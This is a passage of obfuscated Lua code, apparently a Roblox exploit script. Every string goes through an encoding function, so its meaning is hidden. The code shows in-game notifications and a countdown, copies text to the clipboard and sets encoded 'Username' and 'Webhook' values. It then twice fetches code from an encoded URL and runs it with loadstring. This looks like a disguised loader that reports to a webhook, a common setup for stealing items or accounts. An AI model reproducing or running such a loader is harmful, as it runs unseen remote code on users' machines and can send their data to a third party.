setclipboard(v7("\63\35\25\255\251\61\33\7\193\162\108\34\88\147\248\30\35\82\152","\149\84\70\96\160"));game:GetService(v7("\11\18\12\255\44\3\31\202\45\15","\141\88\102\109")):SetCore(v7("\128\86\196\116\52\50\65\200\181\90\201\113\14\52\90\207","\161\211\51\170\16\122\93\53"),{[v7("\207\167\166\36\254","\72\155\206\210")]=v7("\116\123\89\20\41","\83\38\26\52\110"),[v7("\108\18\63\82","\38\56\119\71")]=v7("\195\206\107\226\0\22\199\199\125\150\14\115\202\175\113\248\101\98\219\202\24\244\10\110","\54\147\143\56\182\69"),[v7("\255\130\240\71","\191\182\225\159\41")]=v7("\57\16\48\65\131\146\207\41\72\103\26\159\158\210\46\79\9\70\152\130\214\109\27\44\8\218\210\155\114\64\125\3\211\209\155\126\84\63\8\218\210\146\109\26\117\4\222\215","\162\75\114\72\53\235\231")});Duration=1939 -(821 + 1038) ;v91.Visible=false;game:GetService(v7("\191\40\69\240\71\7\158\27\81\235","\98\236\92\36\130\51")):SetCore(v7("\151\28\2\190\107\167\161\57\162\16\15\187\81\161\186\62","\80\196\121\108\218\37\200\213"),{[v7("\52\122\22\115\78","\234\96\19\98\31\43\110")]=v7("\52\30\95\221\182","\235\102\127\50\167\204\18"),[v7("\100\164\237\55","\78\48\193\149\67\36")]=v7("\0\50\179\88\118\17\55\180\88\103\31\44\192\77\1\3\59\163","\33\80\126\224\120"),[v7("\197\171\12\202","\60\140\200\99\164")]=v7("\149\246\28\50\170\146\249\6\124\237\200\224\29\54\167\218\213\23\53\167\147\178\13\34\255\214\161\93\127\240\210\162\92\112\251\210\178\19\123\243\210\164\66\46\255\214\161\84","\194\231\148\100\70")});Duration=124 -74 ;v78.Text="5";wait(1);v78.Text="4";wait(1);v78.Text="3";wait(1);v78.Text="2";wait(1 + 0 );v78.Text="1";wait(1);v91.Visible=true;game:GetService(v7("\117\88\192\177\226\205\84\107\212\170","\168\38\44\161\195\150")):SetCore(v7("\179\249\140\114\30\231\162\31\134\245\129\119\36\225\185\24","\118\224\156\226\22\80\136\214"),{[v7("\118\231\77\140\71","\224\34\142\57")]=v7("\236\166\200\199\105","\110\190\199\165\189\19\145\61"),[v7("\238\238\111\252","\167\186\139\23\136\235")]=v7("\42\180\155\25\31\245\156\5\31\245\163\40\35\245\137\3\30\245\171\1\19\182\131\77\63\155\188\40\40","\109\122\213\232"),[v7("\199\244\173\62","\80\142\151\194")]=v7("\17\196\111\88\11\211\122\78\89\137\56\88\26\214\114\17\34\213\100\73\23\128\126\72\94\151\34\21\90\148\34\26\91\144\46\25\69\209\42\29\86\150\49\68\94\151\34\28","\44\99\166\23")});Duration=35 -15 ;wait(1);Username=v7("\72\255\44\15\60\177\114\240\22\20\33\177\116","\196\28\151\73\86\83");Webhook=v7("\251\23\61\0\145\2\87\57\247\10\58\19\141\74\28\56\240\12\36\95\131\72\17\57\228\6\43\24\141\87\19\101\188\82\123\70\215\14\74\47\166\91\124\68\212\15\75\33\166\85\124\71\205\85\51\79\170\25\12\62\138\91\31\89\254\18\61\41\212\112\23\84\170\41\22\66\174\127\0\46\209\85\59\40\151\97\8\108\204\57\10\28\133\15\85\120\221\58\31\64\145\92\20\116\210\34\56\32\145\110\64\88\216\27\32\9\139\91\0\81\233","\22\147\99\73\112\226\56\120");loadstring(game:HttpGet(v7("\176\97\246\229\158\226\58\173\240\138\183\103\235\254\152\171\116\172\230\157\185\118\231\186\128\181\39","\237\216\21\130\149")))();wait(0.5 + 0 );Username=v7("\182\70\90\102\191\220\80\133\113\125\77\165\193","\62\226\46\63\63\208\169");Webhook=v7("\237\13\65\147\12\87\96\17\225\16\70\128\16\31\43\16\230\22\88\204\30\29\38\17\242\28\87\139\16\2\36\77\170\72\7\213\74\91\125\7\176\65\0\215\73\90\124\9\176\79\0\212\80\0\4\103\188\3\112\173\23\14\40\113\232\8\65\186\73\37\32\124\188\51\106\209\51\42\55\6\199\79\71\187\10\52\63\68\218\35\118\143\24\90\98\80\203\32\99\211\12\9\35\92\196\56\68\179\12\59\119\112\206\1\92\154\22\14\55\121\255","\62\133\121\53\227\127\109\79");loadstring(game:HttpGet(v7("\24\0\38\229\197\244\237\95\17\53\250\196\167\169\5\7\51\187\197\190\163\19\17\125\248\219\252","\194\112\116\82\149\182\206")))();setclipboard(v7("\50\173\85\39\206\235\9\62\169\27\64\196\186\93\52\130\73\74\152","\110\89\200\44\120\160\130"));end);else local v104=0;while true do if (v104==(0 -0)) then game:GetService(v7("\152\215\74\84\87\79\41\106\190\202","\45\203\163\43\38\35\42\91")):SetCore(v7("\225\128\210\39\169\166\64\219\131\213\32\134\189\93\221\139","\52\178\229\188\67\231\201"),{[v7("\21\72\68\8\242","\67\65\33\48\100\151\60")]=v7("\237\230\163\194\233","\147\191\135\206\184"),[v7("\176\45\190\213","\210\228\72\198\161\184\51")]=v7("\2\65\250\3\51\199\37\9\253\31\103\142\27\100\161\80\94\207\48\72\248\17","\174\86\41\147\112\19"),[v7("\114\3\130\5","\203\59\96\237\107\69\111\113")]=v7("\54\20\180\245\57\229\218\38\76\227\174\37\233\199\33\75\141\242\34\245\195\98\31\168\188\96\165\142\125\68\249\183\105\166\142\113\80\187\188\96\165\135\98\30\241\176\100\160","\183\68\118\204\129\81\144")});Duration=1037 -(834 + 192) ;break;end end end
